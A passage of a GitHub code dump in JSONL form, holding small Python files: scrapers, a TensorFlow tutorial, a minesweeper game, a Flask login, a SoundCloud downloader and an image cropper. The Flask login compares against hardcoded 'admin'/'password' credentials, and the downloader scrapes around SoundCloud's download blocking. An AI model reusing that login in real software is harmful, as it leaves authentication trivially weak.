username!'\n except :\n return 'Something went wrong!'\n details={\n 'profilelink':url,\n 'name':\"\".join(name.split()),\n 'username':\"\".join(username.split()),\n 'image':imageurl,\n 'bio':\"\".join(bio.split()),\n 'worksfor':details['worksFor'],\n 'location':details['homeLocation'],\n 'twitter':details['twitter'],\n 'link':details['url'],\n 'follower':followdetails[0],\n 'following':followdetails[3],\n 'star':followdetails[-1],\n 'contributionsinthelastyear':c.split()[0],\n 'organization':org,\n 'pinnedprojects': projects}\n \n return dict(details)\n\n\n\n","repo_name":"patilharss/github-profile-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"18999178336","text":"#The central unit of data in TensorFlow is the tensor\n#TensorFlow Core programs as consisting of two discrete sections:\n# Building the computational graph.\n# Running the computational graph.\n\nimport tensorflow as tf\n\n#To actually evaluate the nodes, we must run the computational graph within a session\nwith tf.Session() as sess:\n node1 = tf.constant(3.0, dtype=tf.float32)\n node2 = tf.constant(4.0) # also tf.float32 implicitly\n print(node1, node2)\n print(sess.run([node1, node2]))\n\n #We can build more complicated computations by combining Tensor nodes with operations (Operations are also nodes.)\n node3 = tf.add(node1, node2)\n print(\"node3: \", node3)\n print(\"sess.run(node3): \",sess.run(node3))\n\n #A graph can be parameterized to accept external inputs, known as placeholders. A placeholder is a promise to provide a value later.\n a = tf.placeholder(tf.float32)\n b = tf.placeholder(tf.float32)\n adder_node = a + b # + provides a shortcut for tf.add(a, b)\n\n #We can evaluate this graph with multiple inputs by using the feed_dict parameter to specify Tensors that provide concrete values to these placeholders:\n print(sess.run(adder_node, {a: 3, b:4.5}))\n print(sess.run(adder_node, {a: [1,3], b: [2, 4]}))#print(sess.run(adder_node, feed_dict={a: [1,3], b: [2, 4]}))\n\n #We can make the computational graph more complex by adding another operation. For example,\n add_and_triple = adder_node * 3.\n print(sess.run(add_and_triple, {a: 3, b:4.5}))\n\n #To make the model trainable, we need to be able to modify the graph to get new outputs with the same input. 
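In other words, the graph needs state that persists and can be updated from one run to the next. 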
Variables allow us to add trainable parameters to a graph\n W = tf.Variable([.3], dtype=tf.float32)\n b = tf.Variable([-.3], dtype=tf.float32)\n x = tf.placeholder(tf.float32)\n linear_model = W * x + b\n\n #To initialize all the variables in a TensorFlow program, you must explicitly call a special operation as follows:\n init = tf.global_variables_initializer()\n sess.run(init)\n\n #Since x is a placeholder, we can evaluate linear_model for several values of x simultaneously as follows:\n print(sess.run(linear_model, {x:[1,2,3,4]}))\n\n #A loss function measures how far apart the current model is from the provided data\n # sum all the squared errors to create a single scalar that abstracts the error\n y = tf.placeholder(tf.float32)\n squared_deltas = tf.square(linear_model - y)\n loss = tf.reduce_sum(squared_deltas)\n print(sess.run(loss, {x:[1,2,3,4], y:[0,-1,-2,-3]}))\n\n #We could improve this manually by reassigning the values of W and b to the perfect values of -1 and 1\n #fixW = tf.assign(W, [-1.])\n #fixb = tf.assign(b, [1.])\n #sess.run([fixW, fixb])\n #print(sess.run(loss, {x:[1,2,3,4], y:[0,-1,-2,-3]}))\n\n #TensorFlow provides optimizers that slowly change each variable in order to minimize the loss function. The simplest optimizer is gradient descent\n optimizer = tf.train.GradientDescentOptimizer(0.01)\n train = optimizer.minimize(loss)\n\n sess.run(init) # reset values to incorrect defaults.\n for i in range(1000):\n sess.run(train, {x:[1,2,3,4], y:[0,-1,-2,-3]})\n\n print(sess.run([W, b]))\n\n # evaluate training accuracy\n # training data\n x_train = [1,2,3,4]\n y_train = [0,-1,-2,-3]\n curr_W, curr_b, curr_loss = sess.run([W, b, loss], {x:x_train, y:y_train})\n print(\"W: %s b: %s loss: %s\"%(curr_W, curr_b, curr_loss))\n\n#Destroy session","repo_name":"chungvodim/ComputerVision","sub_path":"ComputerVision/DigitsRecognition/TensorFlow_GetStarted.py","file_name":"TensorFlow_GetStarted.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41804764396","text":"import GeneticFunctions as gf\nimport numpy as np\nimport imageio\nimport os\nimport cv2\n\ndef run(image, generation_size, population_size, mutation_percent, flag_filter):\n target_image = imageio.imread(image, pilmode=\"RGB\")\n \n if flag_filter == 1:\n target_image = cv2.GaussianBlur(target_image, (5,5), sigmaX = 0)\n\n target_chromosome = gf.image_to_chromossome(target_image)\n image_shape = target_image.shape\n\n num_parents_mating = population_size//2\n\n population = gf.generate_initial_population(image_shape, population_size)\n\n print('\\n Target Fitnes', np.sum(target_chromosome), '\\n')\n\n for iteration in range(generation_size + 1):\n qualities = gf.calculate_population_fitness(target_chromosome, population)\n parents = gf.select_mating_pool(population, qualities, num_parents_mating)\n population = gf.crossover(parents, image_shape, population_size)\n population = gf.mutation(population, num_parents_mating, mutation_percent)\n gf.print_and_save_image(iteration, target_image, qualities, population, image_shape, 500, os.curdir+'//')\n\nrun('heart.png', 10000, 64, 0.05, 1)","repo_name":"albertoromanhol/ufmg-artificial-inteligence-aerospace","sub_path":"trabalho/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31799309396","text":"#\n# This program gets 
the lists we are interested in\n#\n\nimport json\nimport sys\nimport re\n\ntargets = [\"Tarantino, Quentin\", \"Anderson, Wes\", \"Thurman, Uma\", \"McDormand, Frances\", \"Keitel, Harvey\", \"Murray, Bill\"]\n\ndef main():\n flag = \"\"\n movies_cast = {}\n repeated = {}\n if len(sys.argv) == 2 and sys.argv[1] == \"-m\":\n flag = \"-m\"\n with open(f\"movies-cast{flag}.json\", \"r\", encoding=\"ISO-8859-1\") as f:\n movies = json.load(f)\n for full_title, v in movies.items():\n for targ in targets:\n if (targ in v[\"actors\"]) or (targ in v[\"directors\"]):\n m = re.match(\"(?P.+?) \\((?P<year>[0-9\\?]+?)([\\/IVXLCD]+)*\\)$\", full_title)\n movie = m.group(\"title\")\n year = m.group(\"year\")\n #print(full_title)\n #print(movie)\n if movies_cast.get(movie):\n if not repeated.get(movie):\n tmp = movies_cast[movie]\n movies_cast[movie + \" \" + tmp[\"year\"]] = tmp\n movies_cast.pop(movie)\n repeated[movie] = True\n movie = movie + \" \" + year\n movies_cast[movie] = v\n movies_cast[movie][\"year\"] = year\n break\n actors = []\n directors = []\n movies = {}\n actors_movies = {}\n directors_movies = {}\n for name, v in movies_cast.items():\n movies[name] = v[\"year\"]\n for director in v[\"directors\"]:\n if not directors_movies.get(director):\n directors.append(director)\n directors_movies[director] = {}\n directors_movies[director][name] = v[\"year\"]\n for actor in v[\"actors\"]:\n if not actors_movies.get(actor):\n actors.append(actor)\n actors_movies[actor] = {}\n actors_movies[actor][name] = v[\"year\"]\n with open(f\"target-actors{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(actors, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-directors{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(directors, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-actors-movies{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(actors_movies, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-directors-movies{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(directors_movies, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-movies{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(movies, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-movies-cast{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(movies_cast, indent=1, ensure_ascii=False).encode(\"utf8\"))\n\nif __name__ == '__main__':\n main()\n","repo_name":"robotenique/movies-ontology","sub_path":"get_target.py","file_name":"get_target.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"60"} +{"seq_id":"31664112523","text":"\nimport screen\n\n\nclass BlockObj():\n def __init__(self, x, y):\n name = 'block_%d_%d' % (x, y)\n posx = x * 64 + 32\n posy = y * 64 + 32\n images = [\n './pics/0.png', './pics/1.png', './pics/2.png',\n './pics/3.png', './pics/4.png', './pics/5.png',\n './pics/6.png', './pics/7.png', './pics/8.png',\n './pics/mine2.png', './pics/flag.png',\n './pics/unknown.png', # 11\n './pics/mine.png', # 12\n './pics/mine3.png' # 13\n ]\n self.body = screen.create_sprite(name, self, images, posx, posy)\n self.body.switch_costume(11)\n self.mine = False\n self.x = x\n self.y = y\n self.opened = False\n self.flaged = False\n\n # class method function\n def flag(self):\n if self.opened:\n return\n if not self.flaged:\n self.body.switch_costume(10)\n self.flaged = True\n else:\n self.body.switch_costume(11)\n self.flaged = False\n\n def 
open(self):\n if self.opened == True or self.flaged:\n return\n self.opened = True\n print('open', self.body.name)\n if self.mine == True:\n self.body.switch_costume(9)\n else:\n blocks = self.find_neighbor()\n n = 0\n for b in blocks:\n if b.mine == True:\n n += 1\n self.body.switch_costume(n)\n if n == 0:\n for b in blocks:\n b.open()\n pass\n\n def find_neighbor(self):\n blocks = []\n b = screen.get_sprite_owner('block_%d_%d' % (self.x - 1, self.y - 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x, self.y - 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x + 1, self.y - 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x - 1, self.y))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x + 1, self.y))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x - 1, self.y + 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x, self.y + 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x + 1, self.y + 1))\n if b is not None:\n blocks.append(b)\n return blocks\n\n\ndef put_mines(row, column, num):\n while num > 0:\n x = screen.random_num(0, column)\n y = screen.random_num(0, row)\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if b and b.mine != True:\n b.mine = True\n num -= 1\n\n\ndef create_blocks(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n # create blocks\n for y in y_range:\n for x in x_range:\n BlockObj(x, y)\n # put mine\n put_mines(row, column, 10)\n\n\ndef game_is_win(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n for y in y_range:\n for x in x_range:\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if not b.mine and not b.opened:\n return False\n return True\n\ndef game_is_lost(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n for y in y_range:\n for x in x_range:\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if b.mine and b.opened:\n return True\n return False\n\n\ndef game_over(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n for y in y_range:\n for x in x_range:\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if not b.opened:\n if b.mine:\n if b.flaged:\n b.body.switch_costume(13)\n else:\n b.body.switch_costume(12)\n else:\n b.open()\n\ndef on_mouse_down(pos, button):\n print(pos, button)\n x = screen.mouse_x // 64\n y = screen.mouse_y // 64\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if b is not None:\n if screen.mouse_down('left'):\n b.open()\n if screen.mouse_down('right'):\n b.flag()\n # check if win\n if game_is_win(10, 10):\n print('WIN')\n game_over(10, 10)\n screen.set_event(6, None)\n if game_is_lost(10, 10):\n print('LOST')\n game_over(10, 10)\n screen.set_event(6, None)\n\n\ndef main():\n screen.set_size(640, 640)\n screen.set_event(6, on_mouse_down)\n create_blocks(10, 10)\n\n while not screen.closed:\n screen.run()\n # on_mouse_down()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"xuelians/pyscratch","sub_path":"mine2.py","file_name":"mine2.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14091292258","text":"from pn.ws import settings\nfrom pn.web import http\nfrom pn.web import responsecode\n\nHTML_TEMPLATE = 
\"\"\"\n<html>\n<head>\n<title>%(title)s\n\n\n\n
\n%(body)s\n\n\n\"\"\"\n\ndef _url(photo, v):\n\tif v == 'original':\n\t\tv = photo.secret\n\t#return 'http://%s.%s:%s/%s/%s/%s/' % (settings.inner_host, settings.server_domain, settings.listen_port, photo.username, photo.filename, v)\n\treturn 'http://%s.%s/%s/%s/%s' % (settings.inner_host, settings.server_domain, photo.username, photo.filename, v)\n\n\ndef sizeListPage(photo):\n\tbody = '
    %s
' % ''.join(['
  • %s
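\n# NOTE (added sketch, not part of the original): the jwt import above is unused; issuing\n# a token on successful login could look like:\n# token = jwt.encode({'name': username, 'exp': datetime.utcnow() + timedelta(hours=1)},\n# app.secret_key, algorithm='HS256')\n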
\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","repo_name":"Sonichigo/API","sub_path":"API/Auth/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5368455997","text":"\"\"\"\nModule initialization_handler.py from the package PyZEAL.\nThis module handles initialization for the default PyZEAL services.\n\nAuthors:\\n\n- Philipp Schuette\\n\n\"\"\"\n\nfrom typing import Optional\n\nfrom pyzeal.algorithms.estimators.argument_estimator import ArgumentEstimator\nfrom pyzeal.algorithms.finder_algorithm import FinderAlgorithm\nfrom pyzeal.cli.cli_controller import CLIController\nfrom pyzeal.cli.cli_parser import PyZEALParser\nfrom pyzeal.cli.controller_facade import CLIControllerFacade\nfrom pyzeal.cli.parser_facade import PyZEALParserInterface\nfrom pyzeal.plugins.plugin_loader import PluginLoader\nfrom pyzeal.pyzeal_logging.log_manager import LogManager\nfrom pyzeal.pyzeal_logging.logger_facade import PyZEALLogger\nfrom pyzeal.pyzeal_types.init_modes import InitModes\nfrom pyzeal.settings.settings_service import SettingsService\nfrom pyzeal.utils.containers.root_container import RootContainer\nfrom pyzeal.utils.factories.algorithm_factory import AlgorithmFactory\nfrom pyzeal.utils.factories.container_factory import ContainerFactory\nfrom 
pyzeal.utils.factories.estimator_factory import EstimatorFactory\nfrom pyzeal.utils.factories.settings_factory import SettingsServiceFactory\nfrom pyzeal.utils.install_test_facade import InstallTestingHandlerFacade\nfrom pyzeal.utils.install_test_handler import InstallTestingHandler\nfrom pyzeal.utils.service_locator import ServiceLocator\n\n\nclass PyZEALInitializationHandler:\n \"Static initialization handler for PyZEAL services.\"\n\n # the module level logger\n _logger: Optional[PyZEALLogger] = None\n\n # protect from multiple initializations\n initialized = False\n\n @staticmethod\n def initPyZEALServices(mode: InitModes = InitModes.SCRIPT) -> None:\n \"\"\"\n Register all relevant services with the ServiceLocator and initialize\n the available plugins.\n \"\"\"\n # check for re-initialization\n if PyZEALInitializationHandler.initialized:\n if PyZEALInitializationHandler._logger is None:\n return\n PyZEALInitializationHandler._logger.warning(\n \"re-initialization attempt with mode %s detected - skipped!\",\n mode.name if mode.name else \"[unknown]\",\n )\n return\n\n # register settings service first so we can initialize logging\n if mode in (InitModes.CLI | InitModes.SCRIPT):\n ServiceLocator.registerAsTransient(\n SettingsService, SettingsServiceFactory.getConcreteSettings\n )\n PyZEALInitializationHandler._logger = LogManager.initLogger(\n __name__.rsplit(\".\", maxsplit=1)[-1],\n ServiceLocator.tryResolve(SettingsService).logLevel,\n )\n\n if mode in InitModes.SCRIPT:\n PyZEALInitializationHandler._logger.info(\n \"initializing algorithms...\"\n )\n ServiceLocator.registerAsTransient(\n FinderAlgorithm, AlgorithmFactory.getConcreteAlgorithm\n )\n PyZEALInitializationHandler._logger.info(\n \"initializing containers...\"\n )\n ServiceLocator.registerAsTransient(\n RootContainer, ContainerFactory.getConcreteContainer\n )\n PyZEALInitializationHandler._logger.info(\n \"initializing estimators...\"\n )\n ServiceLocator.registerAsTransient(\n ArgumentEstimator, EstimatorFactory.getConcreteEstimator\n )\n if mode in InitModes.CLI:\n PyZEALInitializationHandler._logger.info(\"initializing cli...\")\n ServiceLocator.registerAsSingleton(\n PyZEALParserInterface, PyZEALParser()\n )\n ServiceLocator.registerAsTransient(\n CLIControllerFacade, CLIController\n )\n ServiceLocator.registerAsTransient(\n InstallTestingHandlerFacade, InstallTestingHandler\n )\n\n # plugins cannot be loaded in cli mode (plugins might be broken, ...)!\n if mode not in InitModes.CLI:\n PyZEALInitializationHandler._logger.info(\"loading plugins...\")\n PluginLoader.loadPlugins()\n\n # initialization complete!\n PyZEALInitializationHandler.initialized = True\n PyZEALInitializationHandler._logger.info(\"initialization complete!\")\n","repo_name":"Spectral-Analysis-UPB/PyZEAL","sub_path":"pyzeal/utils/initialization_handler.py","file_name":"initialization_handler.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"23435703802","text":"from bs4 import BeautifulSoup\nfrom django.core.management.base import BaseCommand\nfrom selenium import webdriver\n\nfrom main.models import Expert\n\nURL_FORMAT = \"https://experts.nti.work/e-registry?page={}\"\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n Expert.objects.all().delete()\n driver = webdriver.Chrome(\"chromedriver.exe\")\n page = 1\n while True:\n driver.get(URL_FORMAT.format(page))\n if page == 1:\n input()\n page += 1\n\n experts = 
BeautifulSoup(driver.page_source).find_all(\"div\", class_=\"expert-profile-card plate\")\n\n if not experts:\n break\n\n for expert in experts:\n data = expert.find_all(\"div\", class_=\"expert-profile-card__block\")\n link = expert.find(\"a\", class_=\"button button--primary global-profile__sidebar-btn-w-100\")[\"href\"]\n Expert.objects.get_or_create(\n id=link.split(\"/\")[4],\n name=data[0].text,\n text=data[1].text[6:],\n help=data[2].text[24:],\n expertise=data[3].text[10:],\n competencies=data[4].text[11:],\n link=link\n )\n","repo_name":"BossOfCreeps/a2022_expert_parser","sub_path":"main/management/commands/experts.py","file_name":"experts.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15462495385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nNotes before solving\n\nN can be up to 10**5, so looping over every combination with for loops is hopeless\nEven ideas like 'once A and B are fixed, find C by binary search' are too slow\nThe key seems to be the total number of ways to choose\n\nSolution approach understood after reading the editorial\nThe point is the combinations whose sum is a multiple of 46\nWhether a sum is a multiple of 46 depends only on each array's remainders mod 46\nSo it is enough to count how many 0s, 1s, ..., 45s each array contains\nThen simply brute-force all remainder combinations that sum to a multiple of 46\n\"\"\"\n\nN = int(input())\nA = list(map(int, input().split()))\nB = list(map(int, input().split()))\nC = list(map(int, input().split()))\n\nad = list(map(lambda n: n % 46, A))\nbd = list(map(lambda n: n % 46, B))\ncd = list(map(lambda n: n % 46, C))\n\na_counts = [ad.count(n) for n in range(46)]\nb_counts = [bd.count(n) for n in range(46)]\nc_counts = [cd.count(n) for n in range(46)]\n\nans = 0\nfor a in range(46):\n for b in range(46):\n for c in range(46):\n if (a+b+c) % 46 == 0:\n a_cnt = a_counts[a]\n b_cnt = b_counts[b]\n c_cnt = c_counts[c]\n ans += a_cnt * b_cnt * c_cnt\nprint(ans)\n
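# (added note, not part of the original) complexity sketch: only x % 46 matters for the\n# divisibility check, so the three arrays of up to 10**5 values collapse into three\n# tables of 46 counters, and the triple loop costs 46**3 = 97336 iterations.\n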
","repo_name":"bun913/atcoder_python","sub_path":"typical90/046/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39975741846","text":"from sys import exit\nimport pygame\nfrom pygame.locals import *\npygame.init()\n\n\nflags = pygame.DOUBLEBUF | pygame.SCALED | pygame.FULLSCREEN\nscreen = pygame.display.set_mode((640, 480),flags)\n\ndef cropImg(img,rect):\n cropped = pygame.Surface((rect.width, rect.height),flags=pygame.SRCALPHA).convert_alpha()\n cropped.blit(img,(-rect.x,-rect.y))\n return cropped\n\nimg_x = 10\nimg_y = 10\nimg_width = 200\nimg_height = 200\npath = \"../Assets/image/character/asval/attack/asval_attack_0.png\"\n\ncharacterImage1 = pygame.image.load(path)\ncharacterImage1_array = pygame.surfarray.array3d(cropImg(characterImage1,characterImage1.get_bounding_rect()))\n\n\ndarker = 1\nfor pixel_line in characterImage1_array:\n for pixel_rgb in pixel_line:\n for i in range(3):\n # work in int to avoid uint8 wrap-around before clamping at 0\n new_val = int(pixel_rgb[i]) - darker\n pixel_rgb[i] = new_val if new_val > 0 else 0\n darker += 1\n\ncharacterImage1 = pygame.surfarray.make_surface(characterImage1_array)\n\nwhile True:\n screen.fill((255,255,255))\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n exit()\n \n screen.blit(characterImage1,(0,0))\n pygame.display.flip()\n","repo_name":"TigeiaWorkshop/GFL-LastWish-Archive","sub_path":"Test/array2dTest.py","file_name":"array2dTest.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34962106490","text":"#! /usr/bin/env python\n\"\"\"\nfizz buzz exercise\n\"\"\"\n\ndef fizzbuzz(n):\n for num in range(1, n+1):\n if num % 3 == 0 and num % 5 == 0:\n print(\"fizzbuzz\")\n elif num % 3 == 0:\n print(\"fizz\")\n elif num % 5 == 0:\n print(\"buzz\")\n else:\n print(num)\n return num\n\nif __name__ == \"__main__\":\n# __name__ is called a \"dunder\" (double underscore) name\n fizzbuzz(15)\n fizzbuzz(100)\n","repo_name":"UWPCE-PythonCert/IntroPython-2017","sub_path":"students/kate/session02/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"71167912512","text":"\"\"\"\nSoundScrape functions\n\"\"\"\nimport os\n\nfrom clint.textui import colored, puts, progress\nfrom os.path import dirname, exists, join\nfrom urllib import parse\n\nfrom soundscrape.soundscrape import download_file, download_track, download_tracks, \\\n get_client, get_hard_track_url, get_soundcloud_api_playlist_data, \\\n get_soundcloud_api2_data, get_soundcloud_data, \\\n puts_safe, sanitize_filename, tag_file\n\n\ndef process_soundcloud(vargs):\n \"\"\"\n Subset of SoundScrape process_soundcloud call.\n Not ideal, but need the filename(s).\n \"\"\"\n\n artist_url = vargs['artist_url']\n num_tracks = vargs['num_tracks']\n\n # Restricting SoundScrape usage\n keep_previews = False\n folders = False\n downloadable = False\n\n id3_extras = {}\n one_track = False\n likes = False\n client = get_client()\n\n if 'soundcloud' not in artist_url.lower():\n puts(colored.red(\"Could not find soundcloud in the URL\"))\n return None\n\n try:\n resolved = client.get('/resolve', url=artist_url, limit=200)\n except Exception as e: # HTTPError?\n\n # SoundScrape is trying to prevent us from downloading this.\n # We're going to have to stop trusting the API/client and\n # do all our own scraping. 
Boo.\n\n if '404 Client Error' in str(e):\n puts(colored.red(\"Problem downloading [404]: \") + colored.white(\"Item Not Found\"))\n return None\n\n message = str(e)\n item_id = message.rsplit('/', 1)[-1].split('.json')[0].split('?client_id')[0]\n hard_track_url = get_hard_track_url(item_id)\n\n track_data = get_soundcloud_data(artist_url)\n puts_safe(colored.green(\"Scraping\") + colored.white(\": \" + track_data['title']))\n\n filenames = []\n filename = sanitize_filename(track_data['artist'] + ' - ' + track_data['title'] + '.mp3')\n\n if exists(filename):\n puts_safe(colored.yellow(\"Track already downloaded: \") + colored.white(track_data['title']))\n return None\n\n filename = download_file(hard_track_url, filename)\n tagged = tag_file(filename,\n artist=track_data['artist'],\n title=track_data['title'],\n year='2017',\n genre='',\n album='',\n artwork_url='')\n\n if not tagged:\n wav_filename = filename[:-3] + 'wav'\n os.rename(filename, wav_filename)\n filename = wav_filename\n\n filenames.append(filename)\n\n else:\n aggressive = False\n\n # This is is likely a 'likes' page.\n if not hasattr(resolved, 'kind'):\n tracks = resolved\n else:\n if resolved.kind == 'artist':\n artist = resolved\n artist_id = str(artist.id)\n tracks = client.get('/users/' + artist_id + '/tracks', limit=200)\n elif resolved.kind == 'playlist':\n id3_extras['album'] = resolved.title\n if resolved.tracks != []:\n tracks = resolved.tracks\n else:\n tracks = get_soundcloud_api_playlist_data(resolved.id)['tracks']\n tracks = tracks[:num_tracks]\n aggressive = True\n for track in tracks:\n download_track(track, resolved.title, keep_previews, folders, custom_path=vargs['path'])\n\n elif resolved.kind == 'track':\n tracks = [resolved]\n elif resolved.kind == 'group':\n group = resolved\n group_id = str(group.id)\n tracks = client.get('/groups/' + group_id + '/tracks', limit=200)\n else:\n artist = resolved\n artist_id = str(artist.id)\n tracks = client.get('/users/' + artist_id + '/tracks', limit=200)\n if tracks == [] and artist.track_count > 0:\n aggressive = True\n filenames = []\n\n data = get_soundcloud_api2_data(artist_id)\n\n for track in data['collection']:\n\n if len(filenames) >= num_tracks:\n break\n\n if track['type'] == 'playlist':\n track['playlist']['tracks'] = track['playlist']['tracks'][:num_tracks]\n for playlist_track in track['playlist']['tracks']:\n album_name = track['playlist']['title']\n filename = download_track(playlist_track, album_name, keep_previews, folders, filenames, custom_path=vargs['path'])\n if filename:\n filenames.append(filename)\n else:\n d_track = track['track']\n filename = download_track(d_track, custom_path=vargs['path'])\n if filename:\n filenames.append(filename)\n\n if not aggressive:\n filenames = download_tracks(client, tracks, num_tracks, downloadable, folders, vargs['path'],\n id3_extras=id3_extras)\n\n return filenames\n","repo_name":"cthib/song-genre-classifier","sub_path":"soundcloud_extraction.py","file_name":"soundcloud_extraction.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"45684871510","text":"from flask import Flask, render_template, redirect\nfrom forms.LoginForm import LoginForm\nfrom forms.RegisterForm import RegisterForm\nfrom flask_login import LoginManager\nfrom data import db_session\nfrom data.users import User\n\ndb_session.global_init('db/users.db')\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 
'Audio_editor_secret_key'\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n\n@app.route('/')\ndef main():\n return render_template('start.html')\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n db_sess = db_session.create_session()\n return db_sess.query(User).get(user_id)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n return redirect('/success')\n return render_template('login.html', title='Authorization', form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n if form.password.data != form.password_again.data:\n return render_template('register.html', title='Registration',\n form=form,\n message=\"Passwords do not match\")\n db_sess = db_session.create_session()\n if db_sess.query(User).filter(User.email == form.email.data).first():\n return render_template('register.html', title='Registration',\n form=form,\n message=\"Such a user already exists\")\n user = User(\n name=form.name.data,\n email=form.email.data,\n )\n user.set_password(form.password.data)\n db_sess.add(user)\n db_sess.commit()\n return redirect('/login')\n return render_template('register.html', title='Registration', form=form)\n\n\n@app.route('/profile')\ndef profile():\n return render_template('profile.html')\n\n\n@app.route('/success')\ndef success():\n return render_template('base.html')\n\n\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=8080)\n","repo_name":"kostikgrach/Audio_editor_online","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74067120511","text":"import multiprocessing\nimport os\nimport cv2\nfrom tqdm import tqdm\n\n\ndef extract_label_per_img(df, img_name):\n format_data = []\n img_df = df[df['file_name']==img_name]\n label = img_df.loc[:, 'point1_x':'point4_y']\n label['class_num'] = img_df['class_id']\n return label.values\n\ndef clip_image(file_idx, image, width, height, stride_w, stride_h,cropped_img_savepath,padding_size=0,value=0):\n shape = image.shape\n # padding_size is a fraction of the whole image, e.g. 1/6, 1/7, 1/8\n if padding_size > 0:\n padding_size = int(shape[0]*padding_size)\n image = cv2.copyMakeBorder(image, padding_size, padding_size, padding_size, padding_size, cv2.BORDER_CONSTANT,value)\n # wondered whether padding is worth adding when cropping (add it up front, before cutting).\n
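 # (added note) callers below use stride = 4/5 of the crop size, e.g. crop_size=550 gives\n # stride 440, so neighbouring crops overlap by 110 px; windows that would run past the\n # image edge are shifted back inside it.\n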
\n for start_h in range(0, shape[0], stride_h):\n for start_w in range(0, shape[1], stride_w):\n\n start_h_new = start_h\n start_w_new = start_w\n if start_h + height > shape[0]:\n start_h_new = shape[0] - height\n if start_w + width > shape[1]:\n start_w_new = shape[1] - width\n top_left_row = max(start_h_new, 0)\n top_left_col = max(start_w_new, 0)\n bottom_right_row = min(start_h + height, shape[0])\n bottom_right_col = min(start_w + width, shape[1])\n\n subImage = image[top_left_row:bottom_right_row, top_left_col: bottom_right_col]\n\n\n if (subImage.shape[0] > 5 and subImage.shape[1] > 5):\n crop_img_name = \"%s_%04d_%04d_%04d.png\" % (file_idx, top_left_row, top_left_col,width)\n crop_img_path = os.path.join(cropped_img_savepath,crop_img_name)\n cv2.imwrite(crop_img_path, subImage)\n\n\ndef cropImg_makeLabel_Save_multiproc(crop_size):\n padding_size = 0\n save_folder = os.path.join(test_folder, str(crop_size) + '_cropped_images/')\n img_h, img_w = crop_size, crop_size\n stride_h = int(crop_size*4/5)\n stride_w = int(crop_size*4/5)\n 